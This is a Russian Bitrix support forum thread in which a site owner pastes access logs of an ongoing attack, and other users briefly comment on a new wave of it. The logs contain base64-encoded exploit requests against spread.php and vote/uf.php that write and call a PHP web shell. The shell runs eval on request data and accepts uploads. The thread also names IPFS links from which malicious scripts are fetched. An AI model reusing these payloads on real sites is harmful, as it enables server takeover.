127.0.0.1 - - [02/Feb/2024:01:03:57 +0300] "GET /bitrix/tools/spread.php?state=MD1zeXN0ZW0mMT1lY2hvIFBEOXdhSEFnWldOb2J5QTBNRGszTWpNcU1qQTdhV1lvYldRMUtDUmZRMDlQUzBsRlcyUmRLVDA5SWpFM01ESTRaalE0TjJOaU1tRTRORFl3TnpZME5tUmhNMkZrTXpnM09HVmpJaWw3WldOb2J5SnZheUk3WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSZlVrVlJWVVZUVkZ0cFpGMHBLVHRwWmlna1gxQlBVMVJiSW5Wd0lsMDlQU0oxY0NJcGUwQmpiM0I1S0NSZlJrbE1SVk5iSW1acGJHVWlYVnNpZEcxd1gyNWhiV1VpWFN3a1gwWkpURVZUV3lKbWFXeGxJbDFiSW01aGJXVWlYU2s3ZlgwL1BnPT18YmFzZTY0IC1kfCB0ZWUgLi4vLi4vZjE5NWJmMjVjM2IwLnBocCYyPQ== HTTP/1.0" 404 1284415 "https://***.ru/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
127.0.0.1 - - [02/Feb/2024:01:04:06 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281052 "https://***.ru/bitrix/tools/spread.php?state=MD1zeXN0ZW0mMT1lY2hvIFBEOXdhSEFnWldOb2J5QTBNRGszTWpNcU1qQTdhV1lvYldRMUtDUmZRMDlQUzBsRlcyUmRLVDA5SWpFM01ESTRaalE0TjJOaU1tRTRORFl3TnpZME5tUmhNMkZrTXpnM09HVmpJaWw3WldOb2J5SnZheUk3WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSZlVrVlJWVVZUVkZ0cFpGMHBLVHRwWmlna1gxQlBVMVJiSW5Wd0lsMDlQU0oxY0NJcGUwQmpiM0I1S0NSZlJrbE1SVk5iSW1acGJHVWlYVnNpZEcxd1gyNWhiV1VpWFN3a1gwWkpURVZUV3lKbWFXeGxJbDFiSW01aGJXVWlYU2s3ZlgwL1BnPT18YmFzZTY0IC1kfCB0ZWUgLi4vLi4vZjE5NWJmMjVjM2IwLnBocCYyPQ==" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
127.0.0.1 - - [02/Feb/2024:01:04:16 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281052 "https://***.ru/bitrix/tools/spread.php?state=MD1maWxlX3B1dF9jb250ZW50cyYxPS4uLy4uL2YxOTViZjI1YzNiMC5waHAmMj08P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbZF0pPT0iMTcwMjhmNDg3Y2IyYTg0NjA3NjQ2ZGEzYWQzODc4ZWMiKXtlY2hvIm9rIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUW2lkXSkpO2lmKCRfUE9TVFsidXAiXT09InVwIil7QGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCRfRklMRVNbImZpbGUiXVsibmFtZSJdKTt9fT8+" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
127.0.0.1 - - [02/Feb/2024:12:39:55 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281053 "https://***.ru/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2676.61 Safari/537.36"
127.0.0.1 - - [02/Feb/2024:12:39:56 +0300] "POST / HTTP/1.0" 200 1300319 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2676.61 Safari/537.36"
127.0.0.1 - - [02/Feb/2024:12:39:57 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281053 "https://***.ru/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2676.61 Safari/537.36"
127.0.0.1 - - [02/Feb/2024:12:39:57 +0300] "GET /bitrix/tools/public_session.php?k=65db82d9eaa83fa0ee8c7decd966de68.05df8708f26c0732dd499715072467cf3fa127200bf9cefd4425ce948b4589f4 HTTP/1.0" 200 2 "https://***.ru/bitrix/admin/iblock_element_edit.php?IBLOCK_ID=45&type=catalog_tehno&ID=1170986&lang=ru&find_section_section=0&form_element_45_active_tab=edit1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 YaBrowser/24.1.0.0 Safari/537.36"
127.0.0.1 - - [02/Feb/2024:21:06:44 +0300] "GET /bitrix/tools/composite_data.php HTTP/1.0" 200 317 "https://***.ru/" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
127.0.0.1 - - [02/Feb/2024:21:06:44 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
127.0.0.1 - - [02/Feb/2024:21:06:44 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
127.0.0.1 - - [02/Feb/2024:21:06:44 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
127.0.0.1 - - [02/Feb/2024:21:06:45 +0300] "POST /bitrix/tools/accesson.php HTTP/1.0" 404 1281310 "https://***.ru/" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
127.0.0.1 - - [02/Feb/2024:21:06:45 +0300] "POST /bitrix/tools/f195bf25c3b0.php HTTP/1.0" 404 1281342 "https://***.ru/bitrix/tools/accesson.php" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
127.0.0.1 - - [02/Feb/2024:21:26:31 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [02/Feb/2024:21:26:32 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [02/Feb/2024:21:26:32 +0300] "GET / HTTP/1.0" 200 1291256 "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [02/Feb/2024:21:26:32 +0300] "POST /accesson.php HTTP/1.0" 404 1281448 "https://***.ru/" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [02/Feb/2024:21:26:33 +0300] "POST /f195bf25c3b0.php HTTP/1.0" 404 1281480 "https://***.ru/accesson.php" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [03/Feb/2024:07:48:29 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281053 "https://***.ru/bitrix/tools/spread.php?state=MD1zeXN0ZW0mMT1lY2hvIFBEOXdhSEFnWldOb2J5QTBNRGszTWpNcU1qQTdhV1lvYldRMUtDUmZRMDlQUzBsRlcyUmRLVDA5SWpFM01ESTRaalE0TjJOaU1tRTRORFl3TnpZME5tUmhNMkZrTXpnM09HVmpJaWw3WldOb2J5SnZheUk3WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSZlVrVlJWVVZUVkZ0cFpGMHBLVHRwWmlna1gxQlBVMVJiSW5Wd0lsMDlQU0oxY0NJcGUwQmpiM0I1S0NSZlJrbE1SVk5iSW1acGJHVWlYVnNpZEcxd1gyNWhiV1VpWFN3a1gwWkpURVZUV3lKbWFXeGxJbDFiSW01aGJXVWlYU2s3ZlgwL1BnPT18YmFzZTY0IC1kfCB0ZWUgLi4vLi4vZjE5NWJmMjVjM2IwLnBocCYyPQ==" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.12 Safari/537.36"
127.0.0.1 - - [03/Feb/2024:07:48:52 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281053 "https://***.ru/bitrix/tools/spread.php?state=MD1maWxlX3B1dF9jb250ZW50cyYxPS4uLy4uL2YxOTViZjI1YzNiMC5waHAmMj08P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbZF0pPT0iMTcwMjhmNDg3Y2IyYTg0NjA3NjQ2ZGEzYWQzODc4ZWMiKXtlY2hvIm9rIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUW2lkXSkpO2lmKCRfUE9TVFsidXAiXT09InVwIil7QGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCRfRklMRVNbImZpbGUiXVsibmFtZSJdKTt9fT8+" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.12 Safari/537.36"
127.0.0.1 - - [03/Feb/2024:18:56:52 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281726 "https://***.ru/" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2944.93 Safari/537.36"
127.0.0.1 - - [03/Feb/2024:18:56:53 +0300] "GET /bitrix/tools/composite_data.php HTTP/1.0" 200 317 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2944.93 Safari/537.36"
127.0.0.1 - - [03/Feb/2024:18:56:53 +0300] "POST /bitrix/tools/vote/uf.php?attachId[ENTITY_TYPE]=CFileUploader&attachId[ENTITY_ID][events][onFileIsStarted][]=CAllAgent&attachId[ENTITY_ID][events][onFileIsStarted][]=Update&attachId[MODULE_ID]=vote&action=vote HTTP/1.0" 404 1283016 "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2944.93 Safari/537.36"
127.0.0.1 - - [03/Feb/2024:21:51:38 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281725 "https://***.ru/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2879.32 Safari/537.36"
127.0.0.1 - - [03/Feb/2024:21:51:39 +0300] "POST / HTTP/1.0" 200 1300991 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2879.32 Safari/537.36"
127.0.0.1 - - [03/Feb/2024:21:51:39 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281725 "https://***.ru/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2879.32 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:08:35 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:08:37 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:08:42 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:08:42 +0300] "GET / HTTP/1.0" 200 1290581 "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:08:43 +0300] "POST /bitrix/tools/f195bf25c3b0.php HTTP/1.0" 404 1280669 "https://***.ru/bitrix/tools/accesson.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:11:58 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2895.22 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:12:10 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2895.22 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:12:10 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2895.22 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:12:10 +0300] "GET / HTTP/1.0" 200 1290581 "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2895.22 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:12:12 +0300] "POST /accesson.php HTTP/1.0" 404 1280774 "https://***.ru/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2895.22 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:12:34 +0300] "POST /f195bf25c3b0.php HTTP/1.0" 404 1280806 "https://***.ru/accesson.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2895.22 Safari/537.36"

Скрипт запускается с определенным периодом. Загружаются скрипты по этим ссылкам:

https://gateway.pinata.cloud/ipfs/QmeFQQveaX32GqrauAuj9uBqBGQbUB7NHcmr96aoeeiVV8
https://gateway.pinata.cloud/ipfs/QmQ9t1MbZnmEayTmcSqSyMiLNRCCiZiviWdNXYAhHDDVdZ

Форум

Центр поддержки

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером

Пользователь 7764388 Заглянувший Сообщений: 1 Регистрация: 05.12.2023	#842 0 05.12.2023 17:31:48 Здравствуйте! Не подскажите, как быть, уже несколько дней какие-то атаки происходя Прикрепленные файлы browser_C9qnKB5b9V.png (156.57 КБ)

Пользователь 247941 Постоянный посетитель Сообщений: 84 Баллов: 13 Регистрация: 16.03.2014	#845 0 08.12.2023 18:17:46 Похоже новая волна пошла Значительно увеличилось количество атак по описанному сценарию

Пользователь 4097266 Постоянный посетитель Сообщений: 88 Баллов: 14 Регистрация: 06.04.2020	#849 0 05.02.2024 15:18:32 В отладчике Прикрепленные файлы 5.png (512.58 КБ)

Пользователь 144171 Посетитель Сообщений: 28 Баллов: 4 Регистрация: 02.10.2012	#850 0 05.02.2024 15:20:58 это старые дыры, описано было давно, ищите здесь